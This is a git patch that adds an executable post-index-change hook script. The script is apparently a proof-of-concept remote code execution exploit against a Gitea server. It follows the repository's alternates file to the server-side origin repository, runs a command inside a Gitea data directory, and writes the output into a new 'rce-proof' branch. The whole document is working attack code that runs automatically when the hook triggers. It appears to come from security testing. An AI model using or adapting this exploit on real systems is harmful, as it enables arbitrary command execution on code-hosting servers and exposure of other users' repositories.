From 27e0dde6e87045e74c7c910b24879f7c768ee4c7 Mon Sep 17 00:00:00 2001 From: testpoclswcs Date: Thu, 6 Aug 2026 07:45:21 +0200 Subject: [PATCH] apply --- hooks/post-index-change | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100755 hooks/post-index-change diff --git a/hooks/post-index-change b/hooks/post-index-change new file mode 100755 index 0000000..ecec222 --- /dev/null +++ b/hooks/post-index-change @@ -0,0 +1,15 @@ +#!/bin/sh +git_dir=$(git rev-parse --absolute-git-dir) || exit 1 +origin_objects=$(sed -n "1p" "$git_dir/objects/info/alternates") || exit 2 +case "$origin_objects" in + /*) ;; + *) origin_objects="$git_dir/objects/$origin_objects" ;; +esac +origin_git=${origin_objects%/objects} +[ "$origin_git" != "$origin_objects" ] || exit 3 + +output_blob=$(cd /var/lib/gitea/data/gitea-repositories/testpoc7bk13/poc-djofp.git && ls -a 2>&1 | git --git-dir="$origin_git" hash-object -w --stdin) || exit 4 +tree=$(printf "100644 blob %s\tproof\n" "$output_blob" | git --git-dir="$origin_git" mktree) || exit 5 +commit=$(printf "rce proof\n" | GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@x GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@x git --git-dir="$origin_git" commit-tree "$tree") || exit 6 +git --git-dir="$origin_git" update-ref refs/heads/rce-proof "$commit" || exit 7 +exit 0